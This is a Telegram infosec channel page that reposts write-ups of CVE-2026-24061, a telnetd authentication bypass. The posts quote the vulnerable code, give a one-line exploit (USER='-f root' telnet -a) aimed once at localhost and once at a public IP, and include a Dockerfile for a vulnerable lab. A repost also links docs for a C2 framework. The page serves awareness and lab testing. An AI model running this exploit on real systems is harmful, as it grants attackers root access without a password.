现已上线!2025 年 Telegram 研究 — 年度关键洞察 
Fsecurity | HH
前往频道在 Telegram
Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb
显示更多2 019
订阅者
+224 小时
-47 天
-2030 天
帖子存档
2 019
Repost from HaHacking
📠 #события #infrastructure #ad #offense
➡️Снова критические уязвимости! ⚡️
В этот раз: обход аутентификации➡️сразу к
root! С публичным PoC➕использованием в природе;
CVE-2026-24061 — CVSS (v3) ~9.8, Improper Neutralization of Argument Delimiters in a Command / Argument Injection➡️Authentication Bypass в telnetd: появилась тут и была с нами 10+ лет (GNU InetUtils v1.9.3 – v2.7 / 2015 – 2025 гг.);
1️⃣ В v1.9.3 добавили возможность подставить username из переменной окружения USER, чтобы починить автовход для случаев, когда не была доступна аутентификация Kerberos.
Сервер telnetd обращается к /usr/bin/login (обычно работает из-под root)➕передаёт ему значения для входа, в том числе и USER – вместо %U:
...
char *login_invocation =
PATH_LOGIN " -p -h %h %?T{-t %T} -d %L %?u{-u %u}{%U}"
......
case 'U':
return getenv ("USER") ? xstrdup (getenv ("USER")) : xstrdup ("");
.../usr/bin/login есть флаг -f — пропустить аутентификацию! (например, для автовхода getty)
Ему даже можно передать username / UID пользователя: login [-p] [-s shell] [-h host] [-H] [[-f] username|UID]; // Например, root 🐇
3️⃣ Значение USER не нормализуется; Возможно поместить туда дополнительные флаги для /usr/bin/login➕попросить telnet провести автовход (флаги -a / --login):
USER='-f qwqoro' telnet -a 127.0.0.1 2 019
Repost from Adaptix Framework
На выходных по чуть закидывал, вот доки по разработке (совместимость - для следующего релиза 1.1):
* Teamserver Interface + API: https://adaptix-framework.gitbook.io/adaptix-framework/development/teamserver-interface
* Events and Hooks (new feature): https://adaptix-framework.gitbook.io/adaptix-framework/development/teamserver-interface/events-and-hooks
* Extenders development: https://adaptix-framework.gitbook.io/adaptix-framework/development/extenders
2 019
Repost from Кривая опасности
взломать интернет бесплатно 2026
USER="-f root" telnet -a 104.16.149.244 23вот эта штука сверху, которой уже назначен CVE-2026-24061, дает подключиться по telnet сразу как root, без пароля. что? 🐱 Давным давно в 2015 году, почему-то в нашей мировой линии, telnet был неуязвим, но в нём не работал автологин если на машине нет Kerberos. Суть автологина - автоматически передать юзернейм для логина. Как когда по ssh коннектишься не указав логин, машина автоматически коннектится с именем текущего юзера. Без Kerberos, этот юзернейм попросту не детектился. Поэтому разработчики обновили шаблон логина, добавив динамический аргумент %U, что как раз подставляет юзернейм. Новый шаблон:
/usr/bin/login " -p -h %h %?u{-f %u}{%U}"login есть флаг -f, нужный для "этот юзер уже был аутентифицирован где-то ещё, не надо его проверять снова"
2. По RFC 1572, подключаясь по telnet, ты можешь сдать переменные окружения, в том числе $USER с целевым логином
3. содержимое $USER переменной никак не санитизируется
. . .
Теперь перечитай эксплойт
USER="-f root" telnet -a 104.16.149.244 23$USER="-f root" и включаем автологин -a
1. переменная $USER не проверяется, но учитывается сервером
2. $USER подставляется в шаблон логина вместо {%U}
3. сервер получает команду /usr/bin/login -p -f root
4. бинарь login скипает аутентификацию из-за -f
5. поздравляю, ты root
———
Dockerfile для тестовой лабы
FROM debian:11-slim
ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update && \
apt-get install -y --no-install-recommends \
inetutils-telnetd=2:2.0-1+deb11u2 \
telnet && \
rm -rf /var/lib/apt/lists/*
RUN useradd user1 && \
sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf
COPY docker-entrypoint.sh /docker-entrypoint.sh
EXPOSE 23
CMD ["/usr/sbin/inetutils-inetd", "-d"]